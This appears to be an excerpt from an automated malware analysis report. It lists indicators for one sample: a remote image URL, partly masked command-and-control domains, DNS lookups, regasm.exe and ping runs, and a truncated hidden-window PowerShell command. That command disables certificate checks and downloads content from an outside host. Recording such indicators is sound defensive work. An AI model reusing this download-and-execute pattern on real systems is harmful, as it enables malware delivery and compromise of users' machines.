Technical Information
- https://picua.org/images/2020/04/08/4f95ad7252f66de329c024971077f0df.png
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- 'pi##a.org':443
- 'ip###ger.org':443
- DNS ASK google.com
- DNS ASK pi##a.org
- DNS ASK ip###ger.org
- '<SYSTEM32>\ping.exe' google.com' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$NRmfsHiELQhzPc='<PATH_SAMPLE>.vbe';$yXfbJHHxEoaJm=(New-Object Net.WebClient).DownloadString('https://picua.org/images/202...' (with hidden window)
- '<SYSTEM32>\ping.exe' google.com
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'